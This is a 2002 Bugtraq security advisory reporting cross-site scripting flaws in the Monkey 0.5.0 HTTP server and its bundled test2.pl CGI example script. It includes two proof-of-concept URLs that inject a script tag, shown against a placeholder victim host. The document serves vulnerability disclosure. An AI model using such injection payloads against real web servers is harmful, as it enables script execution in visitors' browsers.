[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    XSS bug in Monkey (0.5.0) HTTP server
From:       DownBload <downbload () hotmail ! com>
Date:       2002-09-30 12:27:40
[Download RAW message or body]



	           [ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name: XSS bug in Monkey (0.5.0) HTTP server
Advisory number: 14
Application: Monkey (0.5.0) HTTP server
Application author: Eduardo Silva 
(EdsipeR)                                         
Author e-mail: edsiper@linux-chile.org
Monkey Project: http://monkeyd.sourceforge.net
Date: 29.09.2002
Impact: XSS code execution
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload						
Mail me @: downbload@hotmail.com	




======[ Overview 
Monkey is very simple and fast HTTP server (daemon). 




======[ Problems
1.) Monkey is vulnerable to XSS.
---cut here---
www.victim.com/&lt;script&gt;alert('IIL_0wnZ_YoU!!!');&lt;/script&gt;
---cut here---

2.) There is also XSS bug in test2.pl CGI script (example script) which 
come with Monkey 0.5.0.
---cut here---
www.victim.com/cgi-bin/test2.pl?&lt;script&gt;alert('IIL_0wnZ_YoU!!!');&lt;/script&gt;
---cut here---




======[ Greetz 
Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
(NetZero & Paradox).
I'm very sorry if I forgot someone.

[prev in list] [next in list] [prev in thread] [next in thread]